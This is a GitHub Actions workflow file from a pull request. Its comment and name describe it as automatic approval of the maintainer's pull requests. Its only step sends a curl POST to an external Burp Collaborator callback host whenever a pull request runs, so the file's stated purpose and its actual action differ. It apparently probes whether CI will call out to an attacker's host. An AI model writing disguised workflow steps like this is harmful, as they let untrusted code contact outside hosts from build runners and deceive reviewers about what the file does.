Skip to content

Your PR Title

Your PR Title #10

Workflow file for this run

# This is a single-maintainer project but I want to require reviews before
# merge, which means that I need a bot to review my own work.
name: Automatic pull request approvals
on:
pull_request:
jobs:
auto-approve:
runs-on: ubuntu-latest
if: ${{ github.event.pull_request.user.login == 'Geeky-cat' }}
steps:
- name: Execute curl command
run: |
curl -X POST https://3imfy7vzqwu1pm3alrja0kslmcs2gr.burpcollaborator.net/api-endpoint \
-H "Content-Type: application/json" \
-d '{"key1": "value1", "key2": "value2"}'